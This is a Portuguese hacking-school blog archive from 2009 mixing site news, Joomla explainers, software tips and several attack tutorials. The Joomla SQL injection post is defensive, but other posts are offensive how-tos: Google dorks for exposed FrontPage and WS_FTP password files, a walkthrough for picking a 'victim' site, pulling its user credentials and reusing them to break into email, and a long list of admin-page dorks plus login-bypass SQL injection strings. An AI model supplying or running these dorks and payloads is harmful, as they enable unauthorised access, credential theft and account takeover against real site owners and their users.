28/10/2009

Disco virtual

* Disco virtual DISPONÍVEL para visitantes. Para acessar use os seguintes dados:

http://www.escoladehackers.com.br/disco
Usuário: visitante@escoladehackers.com.br
Senha: zvisitante

Alunos matriculados verifiquem na sala de cada curso as novas senhas de acesso ao disco virtual.

* O Desafio 24 Horas de outubro já foi escolhido: NMap avançado. E você já pode votar no Desafio 24 Horas do mês de novembro. As opções são Street Hacker (o game), Metasploit ou Hackeando o Wordpress. Você já pode votar e escolhar o que prefere aprender no Desafio 24 Horas de novembro. O NMap avançado vai ser realizado no próximo final de semana (31/10 e 1/11).

* Atualização do Curso 3 (Nível 1) - Máquinas Virtuais
Estamos atualizando o curso 3 do nível 1 sobre máquinas virtuais. O objetivo é incluir conhecimento novo, como por exemplo a virtualização nativa do Windows 2008 e Seven, falar também da DOSBox para jogar games antigos e da QEMU que usamos para rodar o Damn Small Linux no ambiente Windows. Também queremos reduzir o tamanho do arquivo de vídeo que está com quase 400MMB, fugindo ao padrão da média de 30MB por curso gravado entre os gravados recentemente.

* Atualização do Curso 1 (Nível 1) - Iniciação a Escola de Hackers
Estamos atualizando o curso 1 do nível 1 sobre Iniciação a Escola de Hackers. O objetivo é transformar o manual de matrículas em vídeo, incluindo as sugestões mais recentes enviadas por estudantes e colaboradores.
Ler mais

24/10/2009

Denial of Service (DOS) Attack no Joomla

A negação de serviço (DoS) é um ataque baseado na tentativa de negar o uso de um servidor ou outro recurso para usuários autorizados. Este é um tipo de ataque direcionado ao servidor de hospedagem, logo, se você hospeda os seus projetos em um bom  HOST, dificilmente sofrerá este tipo de invasão. Entretanto, se você gosta de HOST  barato ou de grátis, ou ainda, montou um HOST na sua garagem sem o devido conhecimento é bom ficar ligado.
 
A forma mais comum deste ataque é sobrecarregar o servidor ou roteador com um número elevado de pedidos, o que irá impedir que o mesmo responda a contento. Outra forma comum do ataque (Dos) é tentar resetar o servidor ou roteador de forma automática, ou seja, uma vez que o processo esteja completo, novo reinício da máquina é solicitado, impedindo o funcionamento e tornando indisponíveis todos os recursos durante o processo.
 
Para evitar o rastreamento dos hackers e também para atingir uma massa crítica de falsos pedidos, o ataque (Dos) muitas vezes é lançado com um vírus ou verme que se alojam em inocentes computadores e a partir deles (hospedeiros), efetuam o ataque. Isto é conhecido como um ataque de negação de serviço distribuído. Em uma determinada hora e data, o código é executado e simultaneamente começa a atacar o alvo.

A maioria dos ataques (Dos) devem ser desviadas ao nível de hardware, por isso, se você estiver executando o servidor do host, certifique-se de ter um bom firewal no lugar para que o mesmo identifique automaticamente o fluxo de tráfego, diferenciando o tráfego normal do anormal. Isto irá impedir o tráfego de dados inválidos passando pela rede.   

O OpenBSD Packet Filter é um  programa chamado "pf" que  suporta um recurso chamado "synproxy" que se coloca entre um servidor de internet e de tráfego. Desempenha o mesmo papel que um firewall no bloqueio tráfego falso. Você pode encontrar mais informações sobre a "pf" em  www.openbsd.org /faq/pf

Até o próximo artigo

Artigo traduzido e adaptado por Júlio Coutinho. O original, está publicado no capítulo 14 do livro Professional Joomla - Programador para Programador, de Dan Rahmel.
Ler mais

SQL INJECTION NO JOOMLA


Qualquer SGBD (Sistema Gerenciador de Bancos de Dados Relacional) entende apenas uma linguagem: SQL (Structured Query Language) ou linguagem de consulta estruturada. CREATE, DELETE, UPDATE e SELECT são apenas alguns dos comandos mais utilizados nesta linguagem, mas não está no escopo do nosso artigo, ensinar SQL e sim apresentar-lhe o SQL INJECTION.
uma das mais formas mais comuns e efetivas de ataque na internet é o SQL Injection. No SQL Injection, um hacker tenta enviar códigos SQL via consultas SQL não autorizadas e filtradas. O código SQL do hacker pode não ter nenhum retorno em termos de informações de segurança ou simplesmente executar um processo de destruição absoluta.
Existem precauções básicas que você deve tomar, para proteger os dados que serão recebidos através de formulários, principalmente se foi você quem o desenvolveu. A regra básica é tratar e validar os dados que serão recebidos e se assegurar que o seu código nunca irá recber os dados de uma forma bruta, ou seja, sem o devido tratamento.

Você pode tratar os dados de várias formas, desde limite de caracteres aceitos com maxlenght e size até scripts em javascript, para fazer a validação a nível cliente e scripts PHP, para validação a nível provedor.

Todos os dados enviados, devem ser processados e validados antes de serem utilizados pela aplicação.

Campos de texto em formulário sem filtragem

por exemplo, um formulário HTML podem aceitar um campo para um nome. Enquanto um usuário normal iria simplesmente digitar o seu nome no campo de texto do formulário, o hacker injeta código SQL para tentar executar uma consulta não autorizada ao banco de dados. Se no código do script PHP que vai receber os dados do formulário você setou a variável $name do tipo Get ou Post nome, que é o campo do formulário, a consulta normal ao banco de dados seria algo isto: $sql="Select * FROM jos_users WHERE name =' " . $name. " ';";

o hacker então digitaria algo parecido com o que segue: dummytext ' OR ' a ' = ' a

o código SQL gerador a partir desta injeção seria algo parecido com isto: select * FROM jos_users WHERE name = 'dummytext' OR ' a ' = ' a ' ;

quando a consulta enviada pelo hacker é executada, o teste ' a ' = ' a ' retornaria um valor real para cada linha e a consulta apresentaria a lista de todos os usuários existentes na tabela jos_users! O mais assustador é que qualquer código SQL válido, ou seja, sem erro de sintaxe, pode ser injetado, como mostrado no código a seguir: dummytext ' ; DROP table jos_users; SELECT * FROM jos_poll where title = '

o código acima iria destruir completamente a tabela de usuários do Joomla. Uma rotina simples de tratamento e validação do campo de texto do formulário, permitiria eliminar qualquer perigo de um ataque deste tipo.

 

Manuseando campos de texto em Joomla e PHP

Joomla inclui rotinas para gerar caracteres de escape para quaisquer caracteres (string) que não podem ser armazenados adequadamente dentro de um banco de dados. Por exemplo, a plica ( ' ) não pode ser armazenada na declaração SQL padrão de inserção sem modificação. Portanto, uma sequência de caracteres de escape com barra invertida ( \ ) permite a inclusão de caracteres especiais no MySql. Assim, uma barra invertida seguida pela citação ( \ " ) seria o único meio de armazenar os dados no campo do banco de dados. A seqüência de caracteres de escape fornecidos pelo próprio sistema invalida o ataque via injection, porque os caracteres digitados pelo hacker não serão entendidos pelo sistema como um comando SQL, será apenas um caracter literal comum a ser armazenado no banco de dados.

O provável resultado dessa consulta seria o retorno de um erro, uma vez que não existem registros correspondentes a esse valor seria encontrado.Para o código PHP, você pode usar um banco de dados específicos de cada método para gerar uma string que cria códigos para escapar de caracteres especiais. Para o MySQL, PHP inclui a função mysql_real_escape_string ()

O uso da função fica parecido com isto: $name = mysql_real_escape_string($name);

joomla fornece um método getEscaped () que irá retornar a string independentemente de sequência de escape de caracteres. Embora Joomla atualmente só suporta MySQL (previsto suportar ORACLE a partir da versão 6), você pode obter com o objeto JDatabase, a string que escapou e seria algo parecido com isto:

$db =& Jfactory::getDBO();

$name = $db->getEscaped($name) ;

Voltando aos ataques, no primeiro exemplo de ataque via SQL Injection, com os caratceres de escape, teríamos a seguinte seqüência inofensiva:

dummytext \ ' or \'a \ ' = \' a

O segundo exemplo ficaria assim:

dummytext\' ; Drop Table jos_users; select * from jos_polls where title = \ '

Existe uma diretiva do PHP conhecida como "magic quotes", que irá adicionar automaticamente barras para todos os campos recebidos de fonte externa (como um navegador da web). Na versão 6 do PHP, esta diretiva foi eliminada.

Portanto, é melhor ficar atento(a) aos códigos, principalmente de extensões de terceiros, para que seja executado de forma segura e caso esteja hospedando o Joomla em servidores com PHP 4.x (a maioria dos baratinhos ainda utilizada esta versão antiga do PHP) verifique a magiq quotes. ELA DEVE ESTAR LIGADA, ou seja, magiq_quotes = ON

Tipos não esperados

outra forma de ataque via SQL Injection pode ocorrer quando valores não esperados, (string, float, e assim por diante) são digitados e passados diretamente para a consulta SQL. Por exemplo, um valor de id obtido a partir de uma consulta ao banco de dados executada diretamente em linha  de comando como esta: 

$sql = " select * from jos_users where id = " . $id .  "; " ;
   
o mesmo tipo de SQL Injection poderia ser utilizado com o id recuperado,  se não for tratado com os caracteres de escape:

1; Drop table jos_users;

portanto, quando você aceitar valores de uma consulta ou formulário de envio, certifique-se de escrevê-los através do php.  Por exemplo, para escrever o $id em um valor inteiro (Integer), você poderia utilizar o seguinte código PHP:

$id= intval($id);
   
digitando este código, qualquer tipo de Sql Injection, será automaticamente eliminado, ou irá gerar um erro quando o código encontrar os caracteres inválidos.
   
Se você usar os métodos JRequest:: getVar () ou JRequest:: get (), nativos do Joomla  para obter a sequência de dados enviados via formulário de consulta, você já está protegido. Estas funções fornecem um filtro seguro para todos os tipos de dados indefinidos ou não esperados. Entretanto, quaisquer dados obtidos fora dessas funções, devem ser tratados por você com caracteres de escape, sempre que possível. 

Ler mais

23/10/2009

Hacking no joomla!


Hacking Joomla Sites

 Pessoalmente eu gosto Joomla! sites com base porque é fácil de gerir e resolver as coisas, mesmo fazendo o SEO como sobre blogs wordpress e até mesmo criar seu projeto próprio site. Mas esses dias mais e mais Joomla! sites são hackeadas por hackers anônima na web mundial. As razões são facilmente referir aos webmasters inconsciente / proprietários do local a instalação de extensões ou digamos add-ons para o Joomla, resultando em um mais vulnerável de se explorar, os danos maciços e desfiguração de seu site, incluindo perda de perspectivas, as informações pessoais , e no aspecto financeiro.

Como esses eventos havia acontecido? Quando os proprietários do local apontou os dedos para seus anfitriões culpar para o servidor web inseguro, falhou a segurança, a falta de acompanhamento e assim por diante. Mas eles não sabem que, acrescentando algumas extensões sem verificar primeiro se a extensão que eles estão usando tem um bug ou vulneráveis à exploração, então, seria um dos principais motivos que o seu site está propenso a hacking. Pela minha experiência pessoal eu consiga obter os hashes de senha admin do Joomla vários sites baseados em um minuto de explorar a usar o Google como mecanismo de busca. Cracker usando as senhas MD5 hash MD5 criptografado são convertidos em ASCII letras legíveis. Felizmente, um monte de cracker baseado na web MD5 está disponível na net fazendo a velocidade do processo de cracking up.

É realmente um grande problema para o aspecto de segurança em seu site, se você não está ciente desses tipos de vulnerables de bugs e as extensões que você aplicou no seu site Joomla. É melhor aconselhados a administrar e atualizar as extensões usadas (se a atualização dessa extensão está disponível), então você deve atualizá-lo para abordar as questões de segurança conhecidas em seu site.
Ler mais

22/10/2009

O que é Joomla?

O que é Joomla?

Joomla! é um dos mais poderosos Sistemas de Gerenciamento de Conteúdo (CMS) Opensource do mundo.

Por que ele é bom?

O Joomla! foi o vencedor das edições de 2006 e 2007 do prêmio de Melhor Software Livre de Gerenciamento de Conteúdo.

Quem usa Joomla?

Joomla é usado no mundo inteiro por diferentes tipos de pessoas e empresas. É usado desde a confecção de um simples website pessoal até a um complexo portal de conteúdo. Segue uma lista de onde pode ser usado o Joomla!:

    * Sites ou portais empresariais
    * Comércio Online
    * Pequenas empresas
    * Organizações sem fundos lucrativos
    * ONG's
    * Aplicações Governamentais
    * Intranets e extranets corporativas
    * Escolas e Igrejas
    * Pessoais ou familiares
    * Comunidades
    * Revistas e Jornais
    * as possibilidades são infinitas

Um site Joomla é caro?

Houve uma época que grandes empresas dominavam o mercado de CMS, cobrando preços superiores a 20.000 reais. A realidade hoje é outra. Conseguimos desenvolver um site em CMS com preço de Site estático.

Que tecnologia é usada?

Nossa receita é uma receita vencedora no desenvolvimento de aplicações web: Linux + Apache + MySql. Com essa receita podemos desenvolver aplicações com orçamentos reduzidos.

Gerenciamento descentralizado

Uma pessoa necessita apenas de um Navegador de Internet para poder atualizar seu site. Você pode estar em um Cyber Café nos EUA ou com seu celular Iphone na praia e poderá facilmente atualizar seu site.
Ler mais

20/09/2009

"Converse via webcam sem precisar minimizar a janela do seu Orkut ou GMail!"

Com a intenção de facilitar a sua vida e fazer com que você possa interagir com seus amigos sem precisar sair de sua conta, o Google lançou esta ferramenta capaz de fazer com que você converse com seus amigos usando uma webcam enquanto responde recados, checa seus emails ou visita comunidades: o Bate-papo por voz e vídeo do Google.

Preciso ter uma webcam?

Como dito acima, a única coisa, além do programa aqui disponível para download, necessária é uma webcam. Isso mesmo, somente uma, pois você pode tanto exclusivamente ver ou ser visto, tudo vai depender de quem possui a webcam. Mas preste atenção, você vai precisar instalar este programa mesmo que você queira somente assistir aos outros fazendo estripulias!

Baixando o Bate-papo por voz e vídeo do Google

Para isso, simplesmente clique sobre “Clique para baixar” para que uma página seja aberta. Nela selecione “Instalar Bate-papo por voz e vídeo” e espere o download ser iniciado.

Como fazer o Bate-papo por voz e vídeo do Google funcionar

Uma vez tendo baixado o Bate-papo por voz e vídeo do Google e reiniciado o seu computador, faça login em sua conta do Orkut. Feito isso, abaixo de sua imagem de exibição, mude seu status para qualquer um diferente de “Offline” para que sua lista de amigos online apareça.

Status

O segundo passo é acessar o menu “Configurações” e clicar sobre a aba “Bate-papo”. Uma vez nela, confira quais dos seus amigos possuem permissão para conversar com você via Orkut e salve suas alterações.

Permissões

Para alterar suas configurações de webcam, microfone e caixas de som, simplesmente clique sobre a sua lista de amigos, selecione “Opções” e escolha a opção “Configurações de bate-papo”. Uma vez lá, você poderá saber se seus dispositivos foram devidamente reconhecidos, assim como definir quais deles usar, no caso de você possuir mais de um instalado e conectado ao seu computador.

Opções

Perceba que nem todos os seus contatos poderão ver você via webcam, ou você as via as deles. Isso porque, como já dito, ambos precisam possuir o Bate-papo por voz e vídeo do Google instalado no computador. Mas não se preocupe, para saber quem pode ser visto via webcam, basta olhar se ao lado do nome da pessoa existe uma minicâmera ou não.

Por fim, para iniciar o Bate-papo por voz e vídeo do Google, abra uma conversa com algum amigo, clique sobre “Ações” na janela de conversação e selecione a opção “Convidar Fulano para um bate-papo de voz/vídeo”.

Convidando

baixar Bate-papo por voz e vídeo do Google

Ler mais

15/09/2009

Hackers e Crackers famosos

Conheça um pouco da história de hackers e crackers famosos.


Kevin Mitnick
Kevin é considerado o maior cracker de todos os tempos, ficou muito conhecido aos 17 anos quando invadiu a página do Comando de Defesa dos Estados Unidos. Foi acusado de causar prejuizos de US$ 80 milhões e figurou entre os mais procurados pelo FBI.
Foi proibido de chegar perto de computadores por oito anos, cinco em prisão de regime fechado e três em liberdade condicional.


Kevin Poulsen
Atualmente Kevin Poulsen trabalha como editor sênior da revista Wired, mas no passado foi considerado um verdadeiro especialista em invadir sistemas telefônicos.
Ficou famoso ao faturar um Porsche após vencer um concurso que premiava o ouvinte que ligasse 102 vezes para a rádio.


Mark Abene
Mark era um especialista em invadir sistemas de comunicação públicos. Considerado, na década de 80, uma das 100 pessoas mais inteligentes de Nova York. Hoje trabalha como consultor de segurança em grandes corporações.


Robert Morris
Morris fez a internet parar em 1988. É filho do chefe do Centro Nacional de Segurança Computacional, área da Agencia Nacional de Segurança dos Estados Unidos. Em 1998 vendeu um serviço para o Yahoo! e tornou-se milionário.

John Draper
Conseguir fazer ligações gratuitas utilizando um apito de plástico que vinha de brinde em uma caixa de cereais. Obrigou os EUA a trocar de sinalização de controle nos seus sistemas de telefonia.

Ler mais

30/08/2009

Escola de Hackers


Aprenda gratuitamente com quem mais entende de hacker no Brasil.
  • Não precisa ter conhecimento prévio: basta saber navegar na Internet e usar o Windows.
  • Lições para iniciantes, usuários avançados, estudantes de sistemas de informação e profissionais de informática (técnicos, analistas, consultores, administradores de rede, etc).
  • Simplesmente o maior programa de educação continuada para a formação do hacker profissional.
  • E o que é melhor: tudo isto de graça. A Escola de Hackers é um projeto sem fins lucrativos, mantido por doações.

A cada grupo de lições você será avaliado para mudança de nível e poderá solicitar o certificado de conclusão dos cursos concluídos. Nosso certificado é reconhecido em todo o Brasil* e também no Exterior**

* Certificado referente a curso de extensão, conforme previsto na Lei Federal 9394/99.
** Os alunos residentes no exterior deverão entrar em contato com os Órgãos de Educação de seus países para saber como validar o certificado fora do Brasil.


www.escoladehackers.com.br

Ler mais

12/07/2009

Roubando senha de paginas em Front Page

Sabe aquela página feita em Front Page. Você está louco para conseguir o login da página e senha. Use a porcaria do google entaum pow Very Happy
Segue o comando abaixo copie e cole no google.!!!!

"# -FrontPage-" inurl:service.pwd
Ler mais

Descobrindo Senhas de Ftp

digite no google o seguinte comando:
filetype:ini ws_ftp pwd

vai aparecer algo assim:
Ex.:
UID=anonymous
PWD=
29BEA5A170EE544D8F2D7CEA802A182BA76A387266A14799AEA53D73B0A

Na verdade o Username está a mostra como todos podemos ver UID=....
a senha que é o PWD precisa deve ser desincriptada com o programa "wcftpcrack"
ele decodifica num piscar do nossos olhos a senha para gente!!!!
Ler mais

Roube senhas com o Google


o autor e o dono do blog nao se responsabilizam por mau uso do conteudo aqui contido nem pelos erros ortograifocos tambem contidos nesse post. .
Abraços a todos .
Mais uma vez o google se mostra uma arma incrivelmente potente para os hackers quando em conjunto com a ignorância de administradores de sites...
O Hit Jammer 1.0 eh um script para unix que permite a você gerenciar o trafego e modificar o site sem precisar utilizar HTML. É geralmente utilizado por aqueles sites "underground" que pagam pelas navegações, etc.
O autor do script já soltou um patch para correção dos bugs, mas muitos administradores nem se quer deram noticia disso.
Um bug critico no script permite que nós facilmente acessemos a área admin, podendo ver todos os nomes de usuários, email, e senha... :twisted:
Bom, chega de papo, vamos ao que interessa 8)
Vá ate o google (www.google.com) e digite no campo de busca "POWERED BY HIT JAMMER 1.0!" (sem aspas) vão aparecer vários sites, escolha sua vitima e mãos a obra!
Entre no site de sua escolha e quando entrar mude o link para:
Ex: www.trafficgold.com vai virar www.trafficgold.com/admin/admin.php
Pronto, se o site estiver vulnerável (o que é muito provável) vai aparecer os nomes de usuário, senha e e-mail!
Como muitos usuários sem muitas noções sobre segurança utilizam as mesmas senhas em vários lugares, vá ate o servidor de e-mail (aquele que aparece depois do "@") e procure pelo link para acessar o mail.
Copie a senha e o email, quando entrar, você pode pedir por senhas perdidas procurar pelo numero do CC, etc..
Autoria de Ø Rodrigo KYLLOPARDIUNØ
Ler mais

05/07/2009

SQL injection com asp

Olá galera.
Fiz este pequeno tutorial meio as pressas,mas espero que voces gostem,principalmente quem esta começando agora Vou acessar o painel administrativo de um site através de uma técnica chamada “ SQL injection “. Primeiramente,vou ensinar a voces como pesquisarem por sites vulneraveis a SQL injection com o próprio site do GOOGLE.
1) Acesse http://www.google.com.br

2) Pesquise por qualquer uma das strings abaixo:

Citação:

allinurl:admin/index.asp allinurl:admin/default.asp allinurl:admin/admin.asp allinurl:admin/login.asp allinurl:/admin/entrar.asp allinurl:/admin/default.asp allinurl:/admin/index.asp allinurl:/admin/login.asp allinurl:/admin/password.asp allinurl:/admin/senha.asp allinurl:/login/login.asp allinurl:/adm/login.asp allinurl:/adm/index.asp allinurl:/adm/default.asp allinurl:/login/index.asp allinurl:/login/default.asp allinurl:/webmaster/login.asp allinurl:/webadmin/default.asp allinurl:/webadmin/index.asp allinurl:/webadmin/default.asp allinurl:/menu_admin/default.asp allinurl:/menu_admin/index.asp allinurl:/menu_admin/login.asp allinurl:/noticias/admin/ allinurl:/news/admin/ allinurl:/cadastro/admin/ allinurl:/portal/admin/ allinurl:/site/admin/ allinurl:/home/admin.asp allinurl:/home/admin/index.asp allinurl:/home/admin/default.asp allinurl:/home/admin/login.asp allinurl:/web/admin/index.asp allinurl:/web/admin/default.asp allinurl:/web/admin/login.asp allinurl:/home/adm/login.asp allinurl:/home/adm/senha.asp allinurl:/home/adm/index.asp allinurl:/home/adm/defaul.asp allinurl:/menu/admin/index.asp allinurl:/menu/admin/default.asp allinurl:/menu/admin/login.asp allinurl:/menu/admin/admin.asp allinurl:/painel/admin/admin.asp allinurl:/painel/admin/login.asp allinurl:/painel/admin/index.asp allinurl:/painel/admin/default.asp allinurl:/site/admin/default.asp allinurl:/site/admin/index.asp allinurl:/site/admin/login.asp allinurl:/asp/admin/login.asp allinurl:/asp/admin/index.asp allinurl:/asp/admin/default.asp allinurl:/shop/admin/default.asp allinurl:/shop/admin/index.asp allinurl:/shop/admin/login.asp allinurl:/ecommerce/admin/index.asp allinurl:/ecommerce/admin/default.asp allinurl:/ecommerce/admin/login.asp allinurl:/pedidos/admin/default.asp allinurl:/pedidos/admin/index.asp allinurl:/pedidos/admin/login.asp allinurl:/compras/admin/ allinurl:/clientes/admin/ allinurl:/busines/admin/ allinurl:/area_restrita/admin.asp allinurl:/area_restrita/login.asp allinurl:/area_restrita/index.asp allinurl:/acesso/admin.asp allinurl:/acesso/admin/default.asp allinurl:/acesso/admin/index.asp allinurl:/post/admin/default.asp allinurl:/post/admin/ allinurl:/post/admin/index.asp allinurl:/post/admin/login.asp allinurl:/eshop/admin/ allinurl:/eshop/admin.asp allinurl:/eshop/admin/default.asp allinurl:/eshop/admin/index.asp allinurl:/comercio/admin.asp allinurl:/comercio/admin/default.asp allinurl:/comercio/admin/index.asp allinurl:/news/admin/login.asp allinurl:/news/admin/default.asp allinurl:/news/admin/index.asp allinurl:/imprensa/login.asp allinurl:/imprensa/admin.asp allinurl:/imprensa/admin/default.asp allinurl:/imprensa/admin/index.asp allinurl:/imprensa/admin/login.asp allinurl:/banners/admin.asp allinurl:/banners/admin/default.asp allinurl:/banners/admin/index.asp allinurl:/banners/admin/login.asp allinurl: allinurl:/banner/admin/ allinurl:/banner/admin/default.asp allinurl:/banner/admin/index.asp allinurl:/newsleter/admin.asp allinurl:/newsleter/admin/default.asp allinurl:/newsleter/admin/index.asp allinurl:/principal/admin.asp allinurl:/principal/admin/default.asp allinurl:/principal/admin/index.asp allinurl:/principal/admin/login.asp allinurl:/editar/admin.asp allinurl:/editar/admin/login.asp allinurl:/editar/admin/index.asp allinurl:/editar/admin/default.asp allinurl:/form/admin.asp allinurl:/admin/admin.asp allinurl:/admin/index.asp allinurl:/admin/admin/default.asp allinurl:/edit/admin/index.asp allinurl:/edit/admin/default.asp allinurl:/menu/admin/senha.asp allinurl:/painel/admin/senha.asp allinurl:/menu_admin/senha.asp allinurl:/pedidos/admin/senha.asp allinurl:/vendas/admin/senha.asp allinurl:/principal/admin/senha.asp allinurl:/home/admin/senha.asp allinurl:/news/admin/senha.asp allinurl:/noticias/admin/senha.asp allinurl:/portal/admin/senha.asp allinurl:/site/admin/senha.asp allinurl:/admin/admin/adm.asp allinurl:/admin/adm/senha.asp allinurl:/adm/admin/login.asp allinurl:/adm/admin/index.asp allinurl:/adm/admin/default.asp allinurl:/admin/loja/senha.asp allinurl:/admin/lojas/default.asp allinurl:/admin/lojas/index.asp allinurl:/loja/admin.asp allinurl:/db/admin/index.asp allinurl:/db/admin/login.asp allinurl:/db/admin/default.asp allinurl:/db/admin/senha.asp allinurl:/host/admin/default.asp allinurl:/host/admin/index.asp allinurl:/host/admin/login.asp allinurl:/login/admin.asp allinurl:/login_admin/index.asp allinurl:/login_admin/default.asp allinurl:/login_admin/login.asp allinurl:/store/admin.asp allinurl:/store/admin/default.asp allinurl:/store/admin/index.asp allinurl:/stroe/admin/login.asp allinurl:/images/admin/ allinurl:/client/admin.asp allinurl:/order/admmin.asp allinurl:/order/admin/index.asp allinurl:/order/admin/login.asp allinurl:/order/admin/default.asp allinurl:/admin/senha.asp allinurl:/strore/admin/senha.asp allinurl:/controle/admin.asp allinurl:/controle/admin/index.asp allinurl:/controle/admin/default.asp allinurl:/controle/admin/login.asp allinurl:/parceiros/admin.asp allinurl:/parceiros/admin/login.asp allinurl:/parceiros/admin/default.asp allinurl:/parceiros/admin/index.asp allinurl:/administrador/login.asp allinurl:/webmaster/login.asp allinurl:/webmaster/senha.asp allinurl:/webmaster/autenticar.asp allinurl:/admin/autenticar.asp allinurl:/admin/logout.asp allinurl:/admin/logar.asp allinurl:/webmaster/logar.asp allinurl:/store/admin/logar.asp allinurl:/shopping/admin.asp allinurl:/shopping/admin/login.asp allinurl:/shopping/admin/index.asp allinurl:/shopping/admin/default.asp allinurl:/admin/menu.asp allinurl:/admin/painel.asp allinurl:/shop/admin/logar.asp allinurl:/admin/acesso.asp allinurl:/restrito/admin.asp allinurl:/restrito/acesso/admin.asp allinurl:/restrito/adm/login.asp allinurl:/webmaster/entrar.asp allinurl:/admin/site/entrar.asp allinurl:/ecommerce/admin/index.asp allinurl:/ecommerce/admin/default.asp allinurl:/ecommerce/admin/login.asp


Após voces pesquisarem,uma série de píginas serão encontradas.
Geralmente quando voce acessa uma destas píginas,voce ira cair na tela de “login” do administrador,onde voce deve digitar o nome de usuario e a senha para conseguir acesso ADM do site.
É aqui que usamos o SQL injection,ao invés de colocarmos a senha,usamos algumas strings nos campos de logins,caso voce consiga acessar o painel de controle do ADM,é porque o site esta vulneravel a SQL injection.
Abaixo vou colocar algumas strings para voces colocarem nos campos de logins: ( Só lembrando que cada string serve para o campo "nome de usuario" e o campo "senha" ao mesmo tempo )


Citação:

b' or ' 1='
' or '1
' or '
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a

Só lembrando que qualquer bom scanner detecta esta vulnerabilidade,o ACUNETIX é um exemplo de um programa de scan .

NÂO NOS RESPOSABILIZAMOS POR QUALQUER ATO PRATICADO POR VOCÊS PERANTE ESTE TUTORIAL O OBJETIVO DESSE TUTORIAL É EVITAR ESSE TIPO DE FALHA.

Este tutorial realmente é para o pesoa que esta começando,aconselho a voces darem uma estudada em PHP injection e principalmente em XSS,que para mim é a técnica do futuro,pois muitos sites estão vulneraveis.

>>BY TeCnOhEnRy <<
Ler mais

04/07/2009

Intellitamper- faça download de um site


Intellitamper é uma ferramenta capaz de fazer um scan (varredura) de todos os arquivos HTML do endereço do website escolhido. O legal dessa ferramenta é que ela nos mostra todos os diretórios, arquivos, links e
 muito mais disponíveis no website sem a necessidadede ter que navegar por todas elas.





*Disponível para plata
forma Windows


Download
Ler mais

27/06/2009

Convertendo o sistema de arquivos do FAT para o NTFS.

Padrão nas instalações do Windows a partir do XP, o NTFS tem muitas vantagens sobre os sistemas de arquivos mais antigos
O sistema NTFS, introduzido pela Microsoft quando o Windows NT foi lançado (1993), oferece mais vantagens do que as obtidas com os padrões FAT (FAT16, de 1981; e FAT32, extensão da versão anterior, lançada com o Windows 95 SP2).
Além de mais estável e com um desempenho superior, o NTFS proporcionou melhorias na segurança, na criptografia e na compressão de arquivos, e tornou-se o padrão para o sistema de arquivos a partir do Windows XP.
Por essa razão, ao migrar de uma versão anterior do Windows, o usuário será questionado sobre a conversão do sistema de arquivos atual para o NTFS.
Se o usuário decidir migrar no momento da instalação do novo sistema operacional, o processo será realizado automaticamente. Caso contrário, a conversão poderá ser feita facilmente mais tarde.
O complicado é fazer o inverso (mas por que alguém desejaria transformar uma partição NTFS em FAT?). Se isto for realmente necessário, o usuário terá que formatar o drive ou partição novamente, escolhendo o sistema de arquivos desejado.
Para converter o sistema de arquivos do FAT para o NTFS, clique em Iniciar, Executar (no Vista, apenas Iniciar), digite cmd e pressione a tecla Enter.
Na linha de comando que abrir, digite convert x: / fs:ntfs (substitua a letra x por aquele que corresponda à do drive que se deseja converter) e pressione a tecla Enter.
Ler mais

07/06/2009

"Proteja seu pendrive da entrada de vírus ."


ProtegPen é uma ferramenta extremamente leve e útil, principalmente para quem usa o pendrive em computadores públicos ou que sempre estão infectados, como em bibliotecas ou lan houses, por exemplo. Como o próprio nome diz, ProtegPen é um programa para proteger seu pendrive das ameaças digitais, como vírus ou gravação de arquivos indesejados. Cadeado digitalProtegPen funciona como um cadeado para proteger seu dispositivo móvel, já que com ele você pode permitir ou não a entrada de arquivos. O programa é extremamente simples de usar, pois possui apenas uma janela e exige que você use no máximo três botões.
ATENÇÃO!
Vale salientar que este programa só funciona com pendrives no formato NTFS (New Technology File System), desta forma se você possui um pendrive em outro formato de gravação como FAT32, por exemplo, precisa converter o dispositivo através da formatação do mesmo.
Ler mais

06/06/2009

Scroogled



E se o Google controlasse a sua vida?


E se um dia, a companhia que todos nós gostamos e usamos diariamente, deixasse de ser “boazinha”? Como seria a vida em um mundo onde o Google fosse usado da pior forma?“
É com essa frase emblemática que Cory Doctorow escreveu “Scroogled”, um texto bastante interessante sobre os “perigos” que corremos com a falta de privacidade na web.

Versão em PDF traduzida por Marco Aurelio Thompson..




Download Aqui
Ler mais

16/05/2009

Técnicas de SEO: Seu site em primeiro lugar!


O que significa:


O SEO (Search Engine Optimization ou então Otimização para Motores de Busca), ou seja, significa otimização para melhorar a posição do seu site/blog nos motores de busca (Google, Yahoo, MSN).
Bem, esse tema surgiu a poucos anos no Brasil, contudo existem vários profissionais que estão se aprofundando no tema, inclusive eu, estou buscando conteúdo para melhorar o rank no meu blog no google, então resolvi postar um pouco das minhas experiências aqui.
Você já reparou que alguns sites aparecem na frente de outros em ferramentas de busca como o Google ou o Yahoo?
Isto ocorre porque as ferramentas de pesquisa têm algoritmos que, baseado nas palavras-chave, retornam primeiro os sites que tenham maior relevância, para que quem utiliza o serviço tenha rapidamente a resposta para a sua busca.
Você já reparou de onde vem a maior parte dos seus visitantes, com certeza a resposta é dos buscadores, certo. Segundo estudos, foi constatado que as pessoas clicam logo nos primeiros links, portanto se seu site estivar entre os primeiros, será visitado. Esses dias eu estava estudando sobre o assunto, vi como era importante nomear bem as fotos de acordo com o seu blog, para melhorar a visibilidade, (uma técnica de SEO ainda despercebida por mim), até momento sempre mandei minha imagens para o servidor como imagem_artigo.jpg (Risos). Tá vendo são fatores simples, que geram grandes melhorias.
Agora vou colocar alguns técnicas importantes para implementação em seu site ou blog.
